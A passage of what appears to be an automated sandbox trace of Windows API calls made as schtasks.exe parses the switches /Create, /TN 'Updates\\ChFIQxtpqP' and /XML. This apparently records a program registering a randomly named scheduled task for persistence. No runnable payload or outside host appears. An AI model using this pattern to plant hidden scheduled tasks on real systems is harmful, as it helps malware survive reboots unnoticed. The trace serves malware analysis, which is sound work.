dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="it") returned 2 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="et") returned 2 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="k") returned 1 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="du") returned 2 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="ri") returned 2 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="z") returned 1 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="f") returned 1 [0195.260] GetThreadLocale () returned 0x409 [0195.260] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.260] lstrlenW (lpString="v1") returned 2 [0195.260] GetThreadLocale () returned 0x409 [0195.260] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.260] lstrlenW (lpString="xml") returned 3 [0195.260] GetThreadLocale () returned 0x409 [0195.260] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.260] lstrlenW (lpString="ec") returned 2 [0195.260] GetThreadLocale () returned 0x409 [0195.260] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.260] lstrlenW (lpString="rl") returned 2 [0195.260] GetThreadLocale () returned 0x409 [0195.260] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.260] lstrlenW (lpString="delay") returned 5 [0195.260] GetThreadLocale () returned 0x409 [0195.260] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.260] lstrlenW (lpString="np") returned 2 [0195.260] SetLastError (dwErrCode=0x0) [0195.260] SetLastError (dwErrCode=0x0) [0195.260] lstrlenW (lpString="/Create") returned 7 [0195.260] lstrlenW (lpString="-/") returned 2 [0195.260] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0195.260] lstrlenW (lpString="create") returned 6 [0195.260] lstrlenW (lpString="create") returned 6 [0195.260] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.260] lstrlenW (lpString="Create") returned 6 [0195.261] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.261] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|create|") returned 8 [0195.261] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|Create|") returned 8 [0195.261] lstrlenW (lpString="|create|") returned 8 [0195.261] lstrlenW (lpString="|Create|") returned 8 [0195.261] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0195.261] SetLastError (dwErrCode=0x0) [0195.261] SetLastError (dwErrCode=0x0) [0195.261] SetLastError (dwErrCode=0x0) [0195.261] lstrlenW (lpString="/TN") returned 3 [0195.261] lstrlenW (lpString="-/") returned 2 [0195.261] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0195.261] lstrlenW (lpString="create") returned 6 [0195.261] lstrlenW (lpString="create") returned 6 [0195.261] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.261] lstrlenW (lpString="TN") returned 2 [0195.261] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.261] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|create|") returned 8 [0195.261] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.261] lstrlenW (lpString="|create|") returned 8 [0195.261] lstrlenW (lpString="|TN|") returned 4 [0195.261] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0195.261] SetLastError (dwErrCode=0x490) [0195.261] lstrlenW (lpString="?") returned 1 [0195.261] lstrlenW (lpString="?") returned 1 [0195.261] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.262] lstrlenW (lpString="TN") returned 2 [0195.262] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.262] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|?|") returned 3 [0195.262] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.262] lstrlenW (lpString="|?|") returned 3 [0195.262] lstrlenW (lpString="|TN|") returned 4 [0195.262] SetLastError (dwErrCode=0x490) [0195.262] lstrlenW (lpString="s") returned 1 [0195.262] lstrlenW (lpString="s") returned 1 [0195.262] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.262] lstrlenW (lpString="TN") returned 2 [0195.262] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.262] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|s|") returned 3 [0195.262] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.262] lstrlenW (lpString="|s|") returned 3 [0195.262] lstrlenW (lpString="|TN|") returned 4 [0195.262] SetLastError (dwErrCode=0x490) [0195.262] lstrlenW (lpString="u") returned 1 [0195.262] lstrlenW (lpString="u") returned 1 [0195.262] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.262] lstrlenW (lpString="TN") returned 2 [0195.262] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.262] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|u|") returned 3 [0195.263] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.263] lstrlenW (lpString="|u|") returned 3 [0195.263] lstrlenW (lpString="|TN|") returned 4 [0195.263] SetLastError (dwErrCode=0x490) [0195.263] lstrlenW (lpString="p") returned 1 [0195.263] lstrlenW (lpString="p") returned 1 [0195.263] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.263] lstrlenW (lpString="TN") returned 2 [0195.263] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.263] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|p|") returned 3 [0195.263] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.263] lstrlenW (lpString="|p|") returned 3 [0195.263] lstrlenW (lpString="|TN|") returned 4 [0195.263] SetLastError (dwErrCode=0x490) [0195.263] lstrlenW (lpString="ru") returned 2 [0195.263] lstrlenW (lpString="ru") returned 2 [0195.263] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.263] lstrlenW (lpString="TN") returned 2 [0195.263] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.263] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|ru|") returned 4 [0195.263] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.263] lstrlenW (lpString="|ru|") returned 4 [0195.263] lstrlenW (lpString="|TN|") returned 4 [0195.263] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0 [0195.263] SetLastError (dwErrCode=0x490) [0195.264] lstrlenW (lpString="rp") returned 2 [0195.264] lstrlenW (lpString="rp") returned 2 [0195.264] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.264] lstrlenW (lpString="TN") returned 2 [0195.264] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.264] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|rp|") returned 4 [0195.264] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.264] lstrlenW (lpString="|rp|") returned 4 [0195.264] lstrlenW (lpString="|TN|") returned 4 [0195.264] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0 [0195.264] SetLastError (dwErrCode=0x490) [0195.264] lstrlenW (lpString="sc") returned 2 [0195.264] lstrlenW (lpString="sc") returned 2 [0195.264] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.264] lstrlenW (lpString="TN") returned 2 [0195.264] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.264] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|sc|") returned 4 [0195.264] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.264] lstrlenW (lpString="|sc|") returned 4 [0195.264] lstrlenW (lpString="|TN|") returned 4 [0195.264] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0 [0195.264] SetLastError (dwErrCode=0x490) [0195.264] lstrlenW (lpString="mo") returned 2 [0195.264] lstrlenW (lpString="mo") returned 2 [0195.265] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.265] lstrlenW (lpString="TN") returned 2 [0195.265] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.265] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|mo|") returned 4 [0195.265] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.265] lstrlenW (lpString="|mo|") returned 4 [0195.265] lstrlenW (lpString="|TN|") returned 4 [0195.265] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0 [0195.265] SetLastError (dwErrCode=0x490) [0195.265] lstrlenW (lpString="d") returned 1 [0195.265] lstrlenW (lpString="d") returned 1 [0195.265] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.265] lstrlenW (lpString="TN") returned 2 [0195.265] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.265] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|d|") returned 3 [0195.265] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.265] lstrlenW (lpString="|d|") returned 3 [0195.265] lstrlenW (lpString="|TN|") returned 4 [0195.265] SetLastError (dwErrCode=0x490) [0195.266] lstrlenW (lpString="m") returned 1 [0195.266] lstrlenW (lpString="m") returned 1 [0195.266] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.266] lstrlenW (lpString="TN") returned 2 [0195.266] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.266] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|m|") returned 3 [0195.266] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.266] lstrlenW (lpString="|m|") returned 3 [0195.266] lstrlenW (lpString="|TN|") returned 4 [0195.266] SetLastError (dwErrCode=0x490) [0195.266] lstrlenW (lpString="i") returned 1 [0195.266] lstrlenW (lpString="i") returned 1 [0195.266] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.266] lstrlenW (lpString="TN") returned 2 [0195.266] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.266] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|i|") returned 3 [0195.267] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.267] lstrlenW (lpString="|i|") returned 3 [0195.267] lstrlenW (lpString="|TN|") returned 4 [0195.267] SetLastError (dwErrCode=0x490) [0195.267] lstrlenW (lpString="tn") returned 2 [0195.267] lstrlenW (lpString="tn") returned 2 [0195.267] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.267] lstrlenW (lpString="TN") returned 2 [0195.267] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.267] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|tn|") returned 4 [0195.267] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|TN|") returned 4 [0195.267] lstrlenW (lpString="|tn|") returned 4 [0195.267] lstrlenW (lpString="|TN|") returned 4 [0195.267] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0195.267] SetLastError (dwErrCode=0x0) [0195.267] SetLastError (dwErrCode=0x0) [0195.267] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0195.267] lstrlenW (lpString="-/") returned 2 [0195.267] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0 [0195.267] SetLastError (dwErrCode=0x490) [0195.267] SetLastError (dwErrCode=0x490) [0195.267] SetLastError (dwErrCode=0x0) [0195.267] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0195.267] StrChrIW (lpStart="Updates\\ChFIQxtpqP", wMatch=0x3a) returned 0x0 [0195.267] SetLastError (dwErrCode=0x490) [0195.267] SetLastError (dwErrCode=0x0) [0195.267] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0195.267] SetLastError (dwErrCode=0x0) [0195.267] SetLastError (dwErrCode=0x0) [0195.268] lstrlenW (lpString="/XML") returned 4 [0195.268] lstrlenW (lpString="-/") returned 2 [0195.268] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0195.268] lstrlenW (lpString="create") returned 6 [0195.268] lstrlenW (lpString="create") returned 6 [0195.268] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.268] lstrlenW (lpString="XML") returned 3 [0195.268] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.268] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|create|") returned 8 [0195.268] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.268] lstrlenW (lpString="|create|") returned 8 [0195.268] lstrlenW (lpString="|XML|") returned 5 [0195.268] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0 [0195.268] SetLastError (dwErrCode=0x490) [0195.268] lstrlenW (lpString="?") returned 1 [0195.268] lstrlenW (lpString="?") returned 1 [0195.268] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.268] lstrlenW (lpString="XML") returned 3 [0195.268] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.268] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|?|") returned 3 [0195.268] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.268] lstrlenW (lpString="|?|") returned 3 [0195.268] lstrlenW (lpString="|XML|") returned 5 [0195.268] SetLastError (dwErrCode=0x490) [0195.268] lstrlenW (lpString="s") returned 1 [0195.268] lstrlenW (lpString="s") returned 1 [0195.268] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.268] lstrlenW (lpString="XML") returned 3 [0195.268] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.268] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|s|") returned 3 [0195.268] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.268] lstrlenW (lpString="|s|") returned 3 [0195.269] lstrlenW (lpString="|XML|") returned 5 [0195.269] SetLastError (dwErrCode=0x490) [0195.269] lstrlenW (lpString="u") returned 1 [0195.269] lstrlenW (lpString="u") returned 1 [0195.269] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.269] lstrlenW (lpString="XML") returned 3 [0195.269] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.269] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|u|") returned 3 [0195.269] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.269] lstrlenW (lpString="|u|") returned 3 [0195.269] lstrlenW (lpString="|XML|") returned 5 [0195.269] SetLastError (dwErrCode=0x490) [0195.269] lstrlenW (lpString="p") returned 1 [0195.269] lstrlenW (lpString="p") returned 1 [0195.269] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.269] lstrlenW (lpString="XML") returned 3 [0195.269] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.269] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|p|") returned 3 [0195.269] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.269] lstrlenW (lpString="|p|") returned 3 [0195.269] lstrlenW (lpString="|XML|") returned 5 [0195.269] SetLastError (dwErrCode=0x490) [0195.269] lstrlenW (lpString="ru") returned 2 [0195.269] lstrlenW (lpString="ru") returned 2 [0195.269] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.269] lstrlenW (lpString="XML") returned 3 [0195.269] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.269] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|ru|") returned 4 [0195.269] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.269] lstrlenW (lpString="|ru|") returned 4 [0195.269] lstrlenW (lpString="|XML|") returned 5 [0195.269] SetLastError (dwErrCode=0x490) [0195.270] lstrlenW (lpString="rp") returned 2 [0195.270] lstrlenW (lpString="rp") returned 2 [0195.270] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.270] lstrlenW (lpString="XML") returned 3 [0195.270] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.270] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|rp|") returned 4 [0195.270] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.270] lstrlenW (lpString="|rp|") returned 4 [0195.270] lstrlenW (lpString="|XML|") returned 5 [0195.270] SetLastError (dwErrCode=0x490) [0195.270] lstrlenW (lpString="sc") returned 2 [0195.270] lstrlenW (lpString="sc") returned 2 [0195.270] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.270] lstrlenW (lpString="XML") returned 3 [0195.270] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.270] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|sc|") returned 4 [0195.270] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.270] lstrlenW (lpString="|sc|") returned 4 [0195.270] lstrlenW (lpString="|XML|") returned 5 [0195.270] SetLastError (dwErrCode=0x490) [0195.270] lstrlenW (lpString="mo") returned 2 [0195.270] lstrlenW (lpString="mo") returned 2 [0195.270] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.270] lstrlenW (lpString="XML") returned 3 [0195.270] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.270] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|mo|") returned 4 [0195.270] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.270] lstrlenW (lpString="|mo|") returned 4 [0195.270] lstrlenW (lpString="|XML|") returned 5 [0195.270] SetLastError (dwErrCode=0x490) [0195.270] lstrlenW (lpString="d") returned 1 [0195.270] lstrlenW (lpString="d") returned 1 [0195.270] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.271] lstrlenW (lpString="XML") returned 3 [0195.271] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.271] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|d|") returned 3 [0195.271] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.271] lstrlenW (lpString="|d|") returned 3 [0195.271] lstrlenW (lpString="|XML|") returned 5 [0195.271] SetLastError (dwErrCode=0x490) [0195.271] lstrlenW (lpString="m") returned 1 [0195.271] lstrlenW (lpString="m") returned 1 [0195.271] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.271] lstrlenW (lpString="XML") returned 3 [0195.271] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.271] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|m|") returned 3 [0195.271] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.271] lstrlenW (lpString="|m|") returned 3 [0195.271] lstrlenW (lpString="|XML|") returned 5 [0195.271] SetLastError (dwErrCode=0x490) [0195.271] lstrlenW (lpString="i") returned 1 [0195.271] lstrlenW (lpString="i") returned 1 [0195.271] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.271] lstrlenW (lpString="XML") returned 3 [0195.271] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.271] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|i|") returned 3 [0195.271] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.271] lstrlenW (lpString="|i|") returned 3 [0195.271] lstrlenW (lpString="|XML|") returned 5 [0195.271] SetLastError (dwErrCode=0x490) [0195.271] lstrlenW (lpString="tn") returned 2 [0195.271] lstrlenW (lpString="tn") returned 2 [0195.271] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.271] lstrlenW (lpString="XML") returned 3 [0195.271] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.272] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|tn|") returned 4 [0195.272] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.272] lstrlenW (lpString="|tn|") returned 4 [0195.272] lstrlenW (lpString="|XML|") returned 5 [0195.272] SetLastError (dwErrCode=0x490) [0195.272] lstrlenW (lpString="tr") returned 2 [0195.272] lstrlenW (lpString="tr") returned 2 [0195.272] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.272] lstrlenW (lpString="XML") returned 3 [0195.272] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.272] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|tr|") returned 4 [0195.272] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.272] lstrlenW (lpString="|tr|") returned 4 [0195.272] lstrlenW (lpString="|XML|") returned 5 [0195.272] SetLastError (dwErrCode=0x490) [0195.272] lstrlenW (lpString="st") returned 2 [0195.272] lstrlenW (lpString="st") returned 2 [0195.272] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.272] lstrlenW (lpString="XML") returned 3 [0195.272] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.272] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|st|") returned 4 [0195.272] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|XML|") returned 5 [0195.272] lstrlenW (lpString="|st|") returned 4 [0195.272] lstrlenW (lpString="|XML|") returned 5 [0195.272] SetLastError (dwErrCode=0x490) [0195.272] lstrlenW (lpString="sd") returned 2 [0195.272] lstrlenW (lpString="sd") returned 2 [0195.272] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.272] lstrlenW (lpString="XML") returned 3 [0195.272] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.272] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dcfa4 | out: _Buffer="|sd|") returned 4 [0195.272] _vsnwprintf (in: _Buffer=0x435318, 